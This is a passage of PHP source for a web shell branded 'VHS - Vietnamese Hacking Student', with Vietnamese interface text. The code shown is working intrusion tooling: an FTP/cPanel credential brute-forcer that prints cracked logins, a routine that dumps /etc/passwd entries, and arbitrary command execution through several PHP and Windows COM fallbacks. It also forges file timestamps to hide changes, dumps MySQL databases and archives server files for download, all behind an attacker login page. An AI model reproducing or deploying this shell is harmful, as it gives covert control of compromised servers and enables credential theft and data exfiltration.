1387. p("<b>[ [email protected] ]# </b>
1388. <b> T&#7845;n c&#244;ng &#273;&#227; &#273;&#432;&#7907;c th&#7921;c hi&#7879;n!<br> T&#224;i kho&#7843;n: <font color='#FF0000'> $user </font> / M&#7853;t kh&#7849;u:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");
1389. }
1390. curl_close($ch);}
1391.  
1392. function cpanel_check($host,$user,$pass,$timeout){
1393. $ch = curl_init();
1394. curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
1395. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1396. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1397. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1398. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1399. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1400. $data = curl_exec($ch);
1401. if ( curl_errno($ch) == 28 ) {
1402. print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1403. exit;}
1404. elseif ( curl_errno($ch) == 0 ){
1405.  
1406. p("<b>[ zorovhsvn@gmail ]# </b><b>T&#7845;n c&#244;ng &#273;&#227; &#273;&#432;&#7907;c th&#7921;c hi&#7879;n!</a> T&#224;i kho&#7843;n: <font color='#FF0000'> $user </font> / M&#7853;t kh&#7849;u:<font color='#FF0000'> $pass </font></b><br>");}curl_close($ch);}
1407.  
1408. if(isset($submit) && !empty($submit)){
1409.  
1410. $userlist = explode ("\n" , $users );
1411. $passlist = explode ("\n" , $pass );
1412. p('<b>[ zorovhsvn@gmail ]# &#272;ang t&#7845;n c&#244;ng ...</font></b><br>');
1413. foreach ($userlist as $user) {
1414. $_user = trim($user);
1415. foreach ($passlist as $password ) {
1416. $_pass = trim($password);
1417. if($option == "ftp"){
1418. ftp_check($target,$_user,$_pass,$connect_timeout);
1419. }
1420. if ($option == "cpanel")
1421. {
1422. cpanel_check($target,$_user,$_pass,$connect_timeout);
1423. }
1424. }
1425. }
1426. }
1427.  
1428. formfoot();
1429. }
1430.  
1431.  
1432.  
1433.  
1434.  
1435.  
1436. elseif ($action == 'etcpwd') {
1437. formhead(array('title'=>'Get /etc/passwd'));
1438. makehide('action','etcpwd');
1439. makehide('dir',$nowpath);
1440. $i = 0;
1441. echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
1442. while ($i < 60000) {
1443.  
1444. $line = posix_getpwuid($i);
1445. if (!empty($line)) {
1446.  
1447. while (list ($key, $vba_etcpwd) = each($line)){
1448. echo "".$vba_etcpwd."\n";
1449. break;
1450. }
1451.  
1452. }
1453.  
1454. $i++;
1455. }
1456. echo "</textarea></p>";
1457. formfoot();
1458. }
1459.  
1460. elseif ($action == 'editfile') {
1461. if(file_exists($opfile)) {
1462. $fp=@fopen($opfile,'r');
1463. $contents=@fread($fp, filesize($opfile));
1464. @fclose($fp);
1465. $contents=htmlspecialchars($contents);
1466. }
1467. formhead(array('title'=>'Create / Edit File'));
1468. makehide('action','file');
1469. makehide('dir',$nowpath);
1470. makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
1471. maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
1472. formfooter();
1473. }//end editfile
1474.  
1475. elseif ($action == 'newtime') {
1476. $opfilemtime = @filemtime($opfile);
1477. //$time = strtotime("$year-$month-$day $hour:$minute:$second");
1478. $cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
1479. formhead(array('title'=>'Clone file was last modified time'));
1480. makehide('action','file');
1481. makehide('dir',$nowpath);
1482. makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1483. makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
1484. formfooter();
1485. formhead(array('title'=>'Set last modified'));
1486. makehide('action','file');
1487. makehide('dir',$nowpath);
1488. makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
1489. p('<p>Instead &raquo;');
1490. p('year:');
1491. makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
1492. p('month:');
1493. makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
1494. p('day:');
1495. makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
1496. p('hour:');
1497. makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
1498. p('minute:');
1499. makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
1500. p('second:');
1501. makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
1502. p('</p>');
1503. formfooter();
1504. }//end newtime
1505.  
1506. elseif ($action == 'shell') {
1507. if (IS_WIN && IS_COM) {
1508. if($program && $parameter) {
1509. $shell= new COM('Shell.Application');
1510. $a = $shell->ShellExecute($program,$parameter);
1511. m('Program run has '.(!$a ? 'Th&#224;nh C&#244;ng' : 'fail'));
1512. }
1513. !$program && $program = 'c:\windows\system32\cmd.exe';
1514. !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
1515. formhead(array('title'=>'Execute Program'));
1516. makehide('action','shell');
1517. makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
1518. p('<p>');
1519. makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
1520. makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1521. p('</p>');
1522. formfoot();
1523. }
1524. formhead(array('title'=>'Execute Command'));
1525. makehide('action','shell');
1526. if (IS_WIN && IS_COM) {
1527. $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
1528. makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
1529. }
1530. p('<p>');
1531. makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
1532. makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
1533. p('</p>');
1534. formfoot();
1535.  
1536. if ($command) {
1537. p('<hr width="100%" noshade /><pre>');
1538. if ($execfunc=='wscript' && IS_WIN && IS_COM) {
1539. $wsh = new COM('WScript.shell');
1540. $exec = $wsh->exec('cmd.exe /c '.$command);
1541. $stdout = $exec->StdOut();
1542. $stroutput = $stdout->ReadAll();
1543. echo $stroutput;
1544. } elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
1545. $descriptorspec = array(
1546. 0 => array('pipe', 'r'),
1547. 1 => array('pipe', 'w'),
1548. 2 => array('pipe', 'w')
1549. );
1550. $process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
1551. if (is_resource($process)) {
1552. fwrite($pipes[0], $command."\r\n");
1553. fwrite($pipes[0], "exit\r\n");
1554. fclose($pipes[0]);
1555. while (!feof($pipes[1])) {
1556. echo fgets($pipes[1], 1024);
1557. }
1558. fclose($pipes[1]);
1559. while (!feof($pipes[2])) {
1560. echo fgets($pipes[2], 1024);
1561. }
1562. fclose($pipes[2]);
1563. proc_close($process);
1564. }
1565. } else {
1566. echo(execute($command));
1567. }
1568. p('</pre>');
1569. }
1570. }//end shell
1571.  
1572.  
1573. else {
1574. m('Kh&#244;ng c&#243; h&#224;nh &#273;&#7897;ng');
1575. }
1576.  
1577. ?>
1578. </td></tr></table>
1579. <div style="padding:10px;border-bottom:1px solid #0E0E0E;border-top:1px solid #0E0E0E;background:#0E0E0E;">
1580. <span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
1581. Copyright (C) 2015 <B></B> - Develop by zorovhs - <a href=http://vhsteamsys.com target=_blank><B>VHS </B></a> <B>- Vietnamese Hacking Student</B> All Rights Reserved.
1582. </div>
1583. </body>
1584. </html>
1585.  
1586. <?php
1587.  
1588. /*======================================================
1589. Show info shell
1590. ======================================================*/
1591.  
1592. function m($msg) {
1593. echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
1594. echo $msg;
1595. echo '</div>';
1596. }
1597. function scookie($key, $value, $life = 0, $prefix = 1) {
1598. global $admin, $timestamp, $_SERVER;
1599. $key = ($prefix ? $admin['cookiepre'] : '').$key;
1600. $life = $life ? $life : $admin['cookielife'];
1601. $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
1602. setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
1603. }
1604. function multi($num, $perpage, $curpage, $tablename) {
1605. $multipage = '';
1606. if($num > $perpage) {
1607. $page = 10;
1608. $offset = 5;
1609. $pages = @ceil($num / $perpage);
1610. if($page > $pages) {
1611. $from = 1;
1612. $to = $pages;
1613. } else {
1614. $from = $curpage - $offset;
1615. $to = $curpage + $page - $offset - 1;
1616. if($from < 1) {
1617. $to = $curpage + 1 - $from;
1618. $from = 1;
1619. if(($to - $from) < $page && ($to - $from) < $pages) {
1620. $to = $page;
1621. }
1622. } elseif($to > $pages) {
1623. $from = $curpage - $pages + $to;
1624. $to = $pages;
1625. if(($to - $from) < $page && ($to - $from) < $pages) {
1626. $from = $pages - $page + 1;
1627. }
1628. }
1629. }
1630. $multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
1631. for($i = $from; $i <= $to; $i++) {
1632. $multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
1633. }
1634. $multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
1635. $multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
1636. }
1637. return $multipage;
1638. }
1639. // Login page
1640. function loginpage() {
1641. ?>
1642. <html>
1643. <head>
1644.  
1645. <body bgcolor=black background=1.jpg>
1646.  
1647. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
1648. <title>VHS - Vietnamese Hacking Student</title>
1649. <style type="text/css">
1650. A:link {text-decoration: none; color: green }
1651. A:visited {text-decoration: none;color:red}
1652. A:active {text-decoration: none}
1653. A:hover {text-decoration: underline; color: green;}
1654. input, textarea, button
1655. {
1656. font-size: 11pt;
1657. color: #FFFFFF;
1658. font-family: verdana, sans-serif;
1659. background-color: #000000;
1660. border-left: 2px dashed #8B0000;
1661. border-top: 2px dashed #8B0000;
1662. border-right: 2px dashed #8B0000;
1663. border-bottom: 2px dashed #8B0000;
1664. }
1665.  
1666. </style>
1667.  
1668. <BR><BR>
1669. <div align=center >
1670.  
1671. <div>
1672. <font color=gray>
1673. <br /><br /><br /><br /><br />
1674.  
1675. <form method="POST" action="">
1676. <span style="font:20pt tahoma;"> </span><input name="password" type="password" size="30">
1677. <input type="hidden" name="doing" value="login">
1678. <input type="submit" value="Login">
1679. </form>
1680. <BR>
1681. <?php
1682. echo "".$err_mess."";
1683. ?>
1684.  
1685. <B><font color=red>
1686.  
1687.  
1688.  
1689.  
1690.  
1691.  
1692. </div>
1693.  
1694.  
1695. </fieldset>
1696.  
1697.  
1698.  
1699. </head>
1700. </html>
1701.  
1702.  
1703. <?php
1704. exit;
1705.  
1706. }//end loginpage()
1707.  
1708. function execute($cfe) {
1709. $res = '';
1710. if ($cfe) {
1711. if(function_exists('exec')) {
1712. @exec($cfe,$res);
1713. $res = join("\n",$res);
1714. } elseif(function_exists('shell_exec')) {
1715. $res = @shell_exec($cfe);
1716. } elseif(function_exists('system')) {
1717. @ob_start();
1718. @system($cfe);
1719. $res = @ob_get_contents();
1720. @ob_end_clean();
1721. } elseif(function_exists('passthru')) {
1722. @ob_start();
1723. @passthru($cfe);
1724. $res = @ob_get_contents();
1725. @ob_end_clean();
1726. } elseif(@is_resource($f = @popen($cfe,"r"))) {
1727. $res = '';
1728. while(!@feof($f)) {
1729. $res .= @fread($f,1024);
1730. }
1731. @pclose($f);
1732. }
1733. }
1734. return $res;
1735. }
1736. function which($pr) {
1737. $path = execute("which $pr");
1738. return ($path ? $path : $pr);
1739. }
1740.  
1741. function cf($fname,$text){
1742. if($fp=@fopen($fname,'w')) {
1743. @fputs($fp,@base64_decode($text));
1744. @fclose($fp);
1745. }
1746. }
1747.  
1748. // Debug
1749. function debuginfo() {
1750. global $starttime;
1751. $mtime = explode(' ', microtime());
1752. $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
1753. echo 'X&#7917; l&#253; trong '.$totaltime.' gi&#226;y(s)';
1754. }
1755.  
1756. // Function connect database
1757. function dbconn($dbhost,$dbuser,$dbpass,$dbname='',$charset='',$dbport='3306') {
1758. if(!$link = @mysql_connect($dbhost.':'.$dbport, $dbuser, $dbpass)) {
1759. p('<h2>Kh&#244;ng th&#7875; k&#7871;t n&#7889;i SQL Sever</h2>');
1760. exit;
1761. }
1762. if($link && $dbname) {
1763. if (!@mysql_select_db($dbname, $link)) {
1764. p('<h2>Database &#273;&#227; ch&#7885;n b&#7883; l&#7895;i</h2>');
1765. exit;
1766. }
1767. }
1768. if($link && mysql_get_server_info() > '4.1') {
1769. if(in_array(strtolower($charset), array('gbk', 'big5', 'utf8'))) {
1770. q("SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link);
1771. }
1772. }
1773. return $link;
1774. }
1775.  
1776. // Array strip
1777. function s_array(&$array) {
1778. if (is_array($array)) {
1779. foreach ($array as $k => $v) {
1780. $array[$k] = s_array($v);
1781. }
1782. } else if (is_string($array)) {
1783. $array = stripslashes($array);
1784. }
1785. return $array;
1786. }
1787.  
1788. // HTML Strip
1789. function html_clean($content) {
1790. $content = htmlspecialchars($content);
1791. $content = str_replace("\n", "<br />", $content);
1792. $content = str_replace(" ", "&nbsp;&nbsp;", $content);
1793. $content = str_replace("\t", "&nbsp;&nbsp;&nbsp;&nbsp;", $content);
1794. return $content;
1795. }
1796.  
1797. // Chmod
1798. function getChmod($filepath){
1799. return substr(base_convert(@fileperms($filepath),10,8),-4);
1800. }
1801.  
1802. function getPerms($filepath) {
1803. $mode = @fileperms($filepath);
1804. if (($mode & 0xC000) === 0xC000) {$type = 's';}
1805. elseif (($mode & 0x4000) === 0x4000) {$type = 'd';}
1806. elseif (($mode & 0xA000) === 0xA000) {$type = 'l';}
1807. elseif (($mode & 0x8000) === 0x8000) {$type = '-';}
1808. elseif (($mode & 0x6000) === 0x6000) {$type = 'b';}
1809. elseif (($mode & 0x2000) === 0x2000) {$type = 'c';}
1810. elseif (($mode & 0x1000) === 0x1000) {$type = 'p';}
1811. else {$type = '?';}
1812.  
1813. $owner['read'] = ($mode & 00400) ? 'r' : '-';
1814. $owner['write'] = ($mode & 00200) ? 'w' : '-';
1815. $owner['execute'] = ($mode & 00100) ? 'x' : '-';
1816. $group['read'] = ($mode & 00040) ? 'r' : '-';
1817. $group['write'] = ($mode & 00020) ? 'w' : '-';
1818. $group['execute'] = ($mode & 00010) ? 'x' : '-';
1819. $world['read'] = ($mode & 00004) ? 'r' : '-';
1820. $world['write'] = ($mode & 00002) ? 'w' : '-';
1821. $world['execute'] = ($mode & 00001) ? 'x' : '-';
1822.  
1823. if( $mode & 0x800 ) {$owner['execute'] = ($owner['execute']=='x') ? 's' : 'S';}
1824. if( $mode & 0x400 ) {$group['execute'] = ($group['execute']=='x') ? 's' : 'S';}
1825. if( $mode & 0x200 ) {$world['execute'] = ($world['execute']=='x') ? 't' : 'T';}
1826.  
1827. return $type.$owner['read'].$owner['write'].$owner['execute'].$group['read'].$group['write'].$group['execute'].$world['read'].$world['write'].$world['execute'];
1828. }
1829.  
1830. function getUser($filepath) {
1831. if (function_exists('posix_getpwuid')) {
1832. $array = @posix_getpwuid(@fileowner($filepath));
1833. if ($array && is_array($array)) {
1834. return ' / <a href="#" title="User: '.$array['name'].'&#13&#10Passwd: '.$array['passwd'].'&#13&#10Uid: '.$array['uid'].'&#13&#10gid: '.$array['gid'].'&#13&#10Gecos: '.$array['gecos'].'&#13&#10Dir: '.$array['dir'].'&#13&#10Shell: '.$array['shell'].'">'.$array['name'].'</a>';
1835. }
1836. }
1837. return '';
1838. }
1839.  
1840. // Delete dir
1841. function deltree($deldir) {
1842. $mydir=@dir($deldir);
1843. while($file=$mydir->read()) {
1844. if((is_dir($deldir.'/'.$file)) && ($file!='.') && ($file!='..')) {
1845. @chmod($deldir.'/'.$file,0777);
1846. deltree($deldir.'/'.$file);
1847. }
1848. if (is_file($deldir.'/'.$file)) {
1849. @chmod($deldir.'/'.$file,0777);
1850. @unlink($deldir.'/'.$file);
1851. }
1852. }
1853. $mydir->close();
1854. @chmod($deldir,0777);
1855. return @rmdir($deldir) ? 1 : 0;
1856. }
1857.  
1858. // Background
1859. function bg() {
1860. global $bgc;
1861. return ($bgc++%2==0) ? 'alt1' : 'alt2';
1862. }
1863.  
1864. // Get path
1865. function getPath($scriptpath, $nowpath) {
1866. if ($nowpath == '.') {
1867. $nowpath = $scriptpath;
1868. }
1869. $nowpath = str_replace('\\', '/', $nowpath);
1870. $nowpath = str_replace('//', '/', $nowpath);
1871. if (substr($nowpath, -1) != '/') {
1872. $nowpath = $nowpath.'/';
1873. }
1874. return $nowpath;
1875. }
1876.  
1877. // Get up path
1878. function getUpPath($nowpath) {
1879. $pathdb = explode('/', $nowpath);
1880. $num = count($pathdb);
1881. if ($num > 2) {
1882. unset($pathdb[$num-1],$pathdb[$num-2]);
1883. }
1884. $uppath = implode('/', $pathdb).'/';
1885. $uppath = str_replace('//', '/', $uppath);
1886. return $uppath;
1887. }
1888.  
1889. // Config
1890. function getcfg($varname) {
1891. $result = get_cfg_var($varname);
1892. if ($result == 0) {
1893. return 'No';
1894. } elseif ($result == 1) {
1895. return 'Yes';
1896. } else {
1897. return $result;
1898. }
1899. }
1900.  
1901. // Function name
1902. function getfun($funName) {
1903. return (false !== function_exists($funName)) ? 'Yes' : 'No';
1904. }
1905.  
1906. function GetList($dir){
1907. global $dirdata,$j,$nowpath;
1908. !$j && $j=1;
1909. if ($dh = opendir($dir)) {
1910. while ($file = readdir($dh)) {
1911. $f=str_replace('//','/',$dir.'/'.$file);
1912. if($file!='.' && $file!='..' && is_dir($f)){
1913. if (is_writable($f)) {
1914. $dirdata[$j]['filename']=str_replace($nowpath,'',$f);
1915. $dirdata[$j]['mtime']=@date('Y-m-d H:i:s',filemtime($f));
1916. $dirdata[$j]['dirchmod']=getChmod($f);
1917. $dirdata[$j]['dirperm']=getPerms($f);
1918. $dirdata[$j]['dirlink']=ue($dir);
1919. $dirdata[$j]['server_link']=$f;
1920. $dirdata[$j]['client_link']=ue($f);
1921. $j++;
1922. }
1923. GetList($f);
1924. }
1925. }
1926. closedir($dh);
1927. clearstatcache();
1928. return $dirdata;
1929. } else {
1930. return array();
1931. }
1932. }
1933.  
1934. function qy($sql) {
1935. //echo $sql.'<br>';
1936. $res = $error = '';
1937. if(!$res = @mysql_query($sql)) {
1938. return 0;
1939. } else if(is_resource($res)) {
1940. return 1;
1941. } else {
1942. return 2;
1943. }
1944. return 0;
1945. }
1946.  
1947. function q($sql) {
1948. return @mysql_query($sql);
1949. }
1950.  
1951. function fr($qy){
1952. mysql_free_result($qy);
1953. }
1954.  
1955. function sizecount($size) {
1956. if($size > 1073741824) {
1957. $size = round($size / 1073741824 * 100) / 100 . ' G';
1958. } elseif($size > 1048576) {
1959. $size = round($size / 1048576 * 100) / 100 . ' M';
1960. } elseif($size > 1024) {
1961. $size = round($size / 1024 * 100) / 100 . ' K';
1962. } else {
1963. $size = $size . ' B';
1964. }
1965. return $size;
1966. }
1967.  
1968. // Zip
1969. class PHPZip{
1970. var $out='';
1971. function PHPZip($dir) {
1972. if (@function_exists('gzcompress')) {
1973. $curdir = getcwd();
1974. if (is_array($dir)) $filelist = $dir;
1975. else{
1976. $filelist=$this -> GetFileList($dir);//File list
1977. foreach($filelist as $k=>$v) $filelist[]=substr($v,strlen($dir)+1);
1978. }
1979. if ((!empty($dir))&&(!is_array($dir))&&(file_exists($dir))) chdir($dir);
1980. else chdir($curdir);
1981. if (count($filelist)>0){
1982. foreach($filelist as $filename){
1983. if (is_file($filename)){
1984. $fd = fopen ($filename, 'r');
1985. $content = @fread ($fd, filesize($filename));
1986. fclose ($fd);
1987. if (is_array($dir)) $filename = basename($filename);
1988. $this -> addFile($content, $filename);
1989. }
1990. }
1991. $this->out = $this -> file();
1992. chdir($curdir);
1993. }
1994. return 1;
1995. }
1996. else return 0;
1997. }
1998.  
1999. // Show file list
2000. function GetFileList($dir){
2001. static $a;
2002. if (is_dir($dir)) {
2003. if ($dh = opendir($dir)) {
2004. while ($file = readdir($dh)) {
2005. if($file!='.' && $file!='..'){
2006. $f=$dir .'/'. $file;
2007. if(is_dir($f)) $this->GetFileList($f);
2008. $a[]=$f;
2009. }
2010. }
2011. closedir($dh);
2012. }
2013. }
2014. return $a;
2015. }
2016.  
2017. var $datasec = array();
2018. var $ctrl_dir = array();
2019. var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
2020. var $old_offset = 0;
2021.  
2022. function unix2DosTime($unixtime = 0) {
2023. $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
2024. if ($timearray['year'] < 1980) {
2025. $timearray['year'] = 1980;
2026. $timearray['mon'] = 1;
2027. $timearray['mday'] = 1;
2028. $timearray['hours'] = 0;
2029. $timearray['minutes'] = 0;
2030. $timearray['seconds'] = 0;
2031. } // end if
2032. return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
2033. ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
2034. }
2035.  
2036. function addFile($data, $name, $time = 0) {
2037. $name = str_replace('\\', '/', $name);
2038.  
2039. $dtime = dechex($this->unix2DosTime($time));
2040. $hexdtime = '\x' . $dtime[6] . $dtime[7]
2041. . '\x' . $dtime[4] . $dtime[5]
2042. . '\x' . $dtime[2] . $dtime[3]
2043. . '\x' . $dtime[0] . $dtime[1];
2044. eval('$hexdtime = "' . $hexdtime . '";');
2045. $fr = "\x50\x4b\x03\x04";
2046. $fr .= "\x14\x00";
2047. $fr .= "\x00\x00";
2048. $fr .= "\x08\x00";
2049. $fr .= $hexdtime;
2050.  
2051. $unc_len = strlen($data);
2052. $crc = crc32($data);
2053. $zdata = gzcompress($data);
2054. $c_len = strlen($zdata);
2055. $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
2056. $fr .= pack('V', $crc);
2057. $fr .= pack('V', $c_len);
2058. $fr .= pack('V', $unc_len);
2059. $fr .= pack('v', strlen($name));
2060. $fr .= pack('v', 0);
2061. $fr .= $name;
2062. $fr .= $zdata;
2063. $fr .= pack('V', $crc);
2064. $fr .= pack('V', $c_len);
2065. $fr .= pack('V', $unc_len);
2066.  
2067. $this -> datasec[] = $fr;
2068. $new_offset = strlen(implode('', $this->datasec));
2069.  
2070. $cdrec = "\x50\x4b\x01\x02";
2071. $cdrec .= "\x00\x00";
2072. $cdrec .= "\x14\x00";
2073. $cdrec .= "\x00\x00";
2074. $cdrec .= "\x08\x00";
2075. $cdrec .= $hexdtime;
2076. $cdrec .= pack('V', $crc);
2077. $cdrec .= pack('V', $c_len);
2078. $cdrec .= pack('V', $unc_len);
2079. $cdrec .= pack('v', strlen($name) );
2080. $cdrec .= pack('v', 0 );
2081. $cdrec .= pack('v', 0 );
2082. $cdrec .= pack('v', 0 );
2083. $cdrec .= pack('v', 0 );
2084. $cdrec .= pack('V', 32 );
2085. $cdrec .= pack('V', $this -> old_offset );
2086. $this -> old_offset = $new_offset;
2087. $cdrec .= $name;
2088.  
2089. $this -> ctrl_dir[] = $cdrec;
2090. }
2091.  
2092. function file() {
2093. $data = implode('', $this -> datasec);
2094. $ctrldir = implode('', $this -> ctrl_dir);
2095. return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
2096. }
2097. }
2098.  
2099. // Dump mysql
2100. function sqldumptable($table, $fp=0) {
2101. $tabledump = "DROP TABLE IF EXISTS $table;\n";
2102. $tabledump .= "CREATE TABLE $table (\n";
2103.  
2104. $firstfield=1;
2105.  
2106. $fields = q("SHOW FIELDS FROM $table");
2107. while ($field = mysql_fetch_array($fields)) {
2108. if (!$firstfield) {
2109. $tabledump .= ",\n";
2110. } else {
2111. $firstfield=0;
2112. }
2113. $tabledump .= " $field[Field] $field[Type]";
2114. if (!empty($field["Default"])) {
2115. $tabledump .= " DEFAULT '$field[Default]'";
2116. }
2117. if ($field['Null'] != "YES") {
2118. $tabledump .= " NOT NULL";
2119. }
2120. if ($field['Extra'] != "") {
2121. $tabledump .= " $field[Extra]";
2122. }
2123. }
2124. fr($fields);
2125.  
2126. $keys = q("SHOW KEYS FROM $table");
2127. while ($key = mysql_fetch_array($keys)) {
2128. $kname=$key['Key_name'];
2129. if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
2130. $kname="UNIQUE|$kname";
2131. }
2132. if(!is_array($index[$kname])) {
2133. $index[$kname] = array();
2134. }
2135. $index[$kname][] = $key['Column_name'];
2136. }
2137. fr($keys);
2138.  
2139. while(list($kname, $columns) = @each($index)) {
2140. $tabledump .= ",\n";
2141. $colnames=implode($columns,",");
2142.  
2143. if ($kname == "PRIMARY") {
2144. $tabledump .= " PRIMARY KEY ($colnames)";
2145. } else {
2146. if (substr($kname,0,6) == "UNIQUE") {
2147. $kname=substr($kname,7);
2148. }
2149. $tabledump .= " KEY $kname ($colnames)";
2150. }
2151. }
2152.  
2153. $tabledump .= "\n);\n\n";
2154. if ($fp) {
2155. fwrite($fp,$tabledump);
2156. } else {
2157. echo $tabledump;
2158. }
2159.  
2160. $rows = q("SELECT * FROM $table");
2161. $numfields = mysql_num_fields($rows);
2162. while ($row = mysql_fetch_array($rows)) {
2163. $tabledump = "INSERT INTO $table VALUES(";
2164.  
2165. $fieldcounter=-1;
2166. $firstfield=1;
2167. while (++$fieldcounter<$numfields) {
2168. if (!$firstfield) {
2169. $tabledump.=", ";
2170. } else {
2171. $firstfield=0;
2172. }
2173.  
2174. if (!isset($row[$fieldcounter])) {
2175. $tabledump .= "NULL";
2176. } else {
2177. $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
2178. }
2179. }
2180.  
2181. $tabledump .= ");\n";
2182.  
2183. if ($fp) {
2184. fwrite($fp,$tabledump);
2185. } else {
2186. echo $tabledump;
2187. }
2188. }
2189. fr($rows);
2190. if ($fp) {
2191. fwrite($fp,"\n");
2192. } else {
2193. echo "\n";
2194. }
2195. }
2196.  
2197. function ue($str){
2198. return urlencode($str);
2199. }
2200.  
2201. function p($str){
2202. echo $str."\n";
2203. }
2204.  
2205. function tbhead() {
2206. p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
2207. }
2208. function tbfoot(){
2209. p('</table>');
2210. }
2211.  
2212. function makehide($name,$value=''){
2213. p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
2214. }
2215.  
2216. function makeinput($arg = array()){
2217. $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
2218. $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
2219. !$arg['type'] && $arg['type'] = 'text';
2220. $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
2221. $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
2222. if ($arg['newline']) {
2223. p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
2224. } else {
2225. p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
2226. }
2227. }
2228.  
2229. function makeselect($arg = array()){
2230. if ($arg['onchange']) {
2231. $onchange = 'onchange="'.$arg['onchange'].'"';
2232. }
2233. $arg['title'] = $arg['title'] ? $arg['title'] : '';
2234. if ($arg['newline']) p('<p>');
2235. p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
2236. if (is_array($arg['option'])) {
2237. foreach ($arg['option'] as $key=>$value) {
2238. if ($arg['selected']==$key) {
2239. p("<option value=\"$key\" selected>$value</option>");
2240. } else {
2241. p("<option value=\"$key\">$value</option>");
2242. }
2243. }
2244. }
2245. p("</select>");
2246. if ($arg['newline']) p('</p>');
2247. }
2248. function formhead($arg = array()) {
2249. !$arg['method'] && $arg['method'] = 'post';
2250. !$arg['action'] && $arg['action'] = $self;
2251. $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
2252. !$arg['name'] && $arg['name'] = 'form1';
2253. p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
2254. if ($arg['title']) {
2255. p('<h2>'.$arg['title'].' &raquo;</h2>');
2256. }
2257. }
2258.  
2259. function maketext($arg = array()){
2260. !$arg['cols'] && $arg['cols'] = 100;
